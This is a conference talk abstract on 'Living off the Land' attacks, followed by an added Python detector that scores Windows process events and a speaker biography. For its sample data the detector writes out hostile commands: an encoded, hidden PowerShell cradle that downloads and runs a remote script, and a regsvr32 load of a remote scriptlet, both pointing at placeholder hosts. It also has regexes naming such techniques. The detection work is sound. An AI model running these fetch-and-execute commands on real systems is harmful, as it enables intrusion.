A deep look into the recent “Living off the Land” threats in the wild

Mingwei Zhang/Symantec

In recent years we have seen a growing number of Living off the Land (LotL) threats. The technique is used not only in targeted attacks but also in malicious campaigns aimed at the general public. In a typical LotL attack, the attacker uses tools that are already installed on the targeted computer, or built-in features of the operating system, to load and execute malicious scripts and/or shellcode directly in memory. As a result, fewer malicious files are created on disk, and the malicious activity can hide among a sea of legitimate processes, making the attack less likely to be detected by security software and solutions.

The Symantec Security Technology & Response group has been closely monitoring the changing threat landscape and has analyzed hundreds of LotL attacks in recent years. In this paper we will take a deep dive into LotL threats based on the most recent in-the-wild samples we have researched.

First, we will share telemetry and statistics that demonstrate the growing trend of LotL attacks.

Then we will discuss the common tactics used in LotL attacks: delivery vectors, the attack surface (built-in tools and features), persistence mechanisms, evasion techniques and payloads.

Next, we will present a few case studies of notable or interesting LotL threats, such as Bluwimps, Kovter, the Pandex downloader, and LNK threats.

Finally, we will discuss the challenges posed by LotL threats, the new trends we have observed, and possible countermeasures.
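The abstract above describes LotL attacks as built-in tools loading scripts or shellcode in memory, and the outline mentions built-in tools, evasion techniques and countermeasures without giving concrete rules. The following is an added example, not Symantec's code or anything from the talk: a small rule-based scorer that runs over constructed process-creation events (shaped like Sysmon Event ID 1 fields: parent image, image, command line) and flags launches of commonly abused Windows tools whose command line fetches or runs code without writing a file. The tool list, the parent-process list, the regexes and the weights are all my assumptions chosen for illustration; the encoded PowerShell payload and the URLs are constructed sample data.

```python
"""Score process-creation events for Living-off-the-Land (LotL) indicators.

Added example, not code from the original page. Events are constructed
here and mimic Sysmon Event ID 1 fields (ParentImage, Image, CommandLine).
"""
import base64
import re

# Built-in Windows tools commonly abused as in-memory loaders (assumed list).
LOLBINS = {
    "powershell.exe", "pwsh.exe", "mshta.exe", "regsvr32.exe", "rundll32.exe",
    "wscript.exe", "cscript.exe", "certutil.exe", "bitsadmin.exe", "wmic.exe",
}
# Document and mail applications that should almost never spawn a LOLBIN.
SUSPICIOUS_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "acrord32.exe"}

# PowerShell -EncodedCommand (and its abbreviations) followed by a base64 blob.
ENC_RE = re.compile(r"(?i)(?:^|\s)-(?:encodedcommand|enc|en|ec|e)\s+([A-Za-z0-9+/=]{20,})")

# (indicator name, weight, regex). Each regex is checked against the raw
# command line and, for PowerShell, against the decoded -EncodedCommand too,
# so an attacker cannot hide a download cradle behind base64.
PATTERNS = [
    ("powershell_encoded", 2, ENC_RE),
    ("powershell_hidden_or_bypass", 1, re.compile(
        r"(?i)-(?:w(?:indowstyle)?\s+hidden|e(?:xecutionpolicy|p)\s+bypass|nop(?:rofile)?\b)")),
    ("download_cradle", 2, re.compile(
        r"(?i)downloadstring|downloadfile|invoke-webrequest|\biwr\b|webclient|start-bitstransfer")),
    ("in_memory_exec", 2, re.compile(
        r"(?i)\b(?:iex|invoke-expression)\b|\[reflection\.assembly\]::load|frombase64string")),
    ("mshta_inline_script", 2, re.compile(r"(?i)mshta(?:\.exe)?\s+\"?(?:javascript|vbscript):")),
    ("regsvr32_scriptlet", 2, re.compile(r"(?i)regsvr32(?:\.exe)?\s.*/i:https?://")),
    ("rundll32_inline_script", 2, re.compile(r"(?i)rundll32(?:\.exe)?\s+javascript:")),
    ("certutil_download", 2, re.compile(r"(?i)certutil(?:\.exe)?\s.*-urlcache")),
    ("remote_url", 1, re.compile(r"(?i)https?://")),
]
ALERT_THRESHOLD = 4  # assumed; a lone LOLBIN launch (score 1) is normal admin activity


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Return the UTF-16LE plaintext behind -EncodedCommand, or None if absent/invalid."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_event(event):
    """Score one process-creation event and list the indicators that fired."""
    image, parent, cmd = basename(event["image"]), basename(event["parent"]), event["cmdline"]
    indicators, score = [], 0
    if image in LOLBINS:
        indicators.append(f"lolbin:{image}")
        score += 1
        if parent in SUSPICIOUS_PARENTS:  # e.g. a document macro spawning a script host
            indicators.append(f"suspicious_parent:{parent}")
            score += 3
    decoded = decode_encoded_command(cmd) if image in ("powershell.exe", "pwsh.exe") else None
    texts = [cmd] + ([decoded] if decoded else [])
    for name, weight, rx in PATTERNS:
        if any(rx.search(t) for t in texts):
            indicators.append(name)
            score += weight
    return {"image": image, "parent": parent, "decoded": decoded,
            "indicators": indicators, "score": score, "alert": score >= ALERT_THRESHOLD}


def scan(events):
    return [analyze_event(e) for e in events]


# Constructed sample data: the attacker-side encoding of a download cradle ...
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode("ascii")

# ... and four constructed events: benign script, Word-spawned encoded
# PowerShell, regsvr32 loading a remote scriptlet, and a benign certutil use.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -NoLogo -File C:\Scripts\backup.ps1"},
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoP -W Hidden -Enc " + ENCODED},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": "regsvr32.exe /s /n /u /i:http://example.invalid/payload.sct scrobj.dll"},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil.exe -hashfile C:\Users\alice\Downloads\setup.exe SHA256"},
]

if __name__ == "__main__":
    for r in scan(SAMPLE_EVENTS):
        flag = "ALERT" if r["alert"] else "ok   "
        print(f"{flag} score={r['score']:2d} {r['parent']} -> {r['image']} {r['indicators']}")
```

The scoring deliberately gives a bare LOLBIN launch only one point, because administrators run these tools constantly; the points come from context (a document reader as parent) and from command-line content, including content that is only visible after decoding the base64 argument. In the constructed events the benign PowerShell and certutil launches score 1, the Word-spawned encoded cradle scores 12 and the regsvr32 scriptlet load scores 4.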

November 8 at 12:00 - 12:30, Stage A

Mingwei Zhang is a principal threat analysis engineer at Symantec Corporation. He joined Symantec in 2013 and has worked in the Security Technology and Response team for 6 years. His tasks have included malware analysis, exploit kit tracking, and malware delivery chain research. He received his master's degree in computer science from the National University of Singapore. Before moving to threat analysis, he worked as a research associate at NUS Temasek Laboratories, where his main research topics included the identification and diagnosis of sophisticated memory exploits, and kernel-level loadable library isolation. Mingwei authored a paper at NDSS 2012 and co-authored a paper at ICECCS 2014. Currently he focuses on emulation-based non-PE malware detection and fileless attack protection.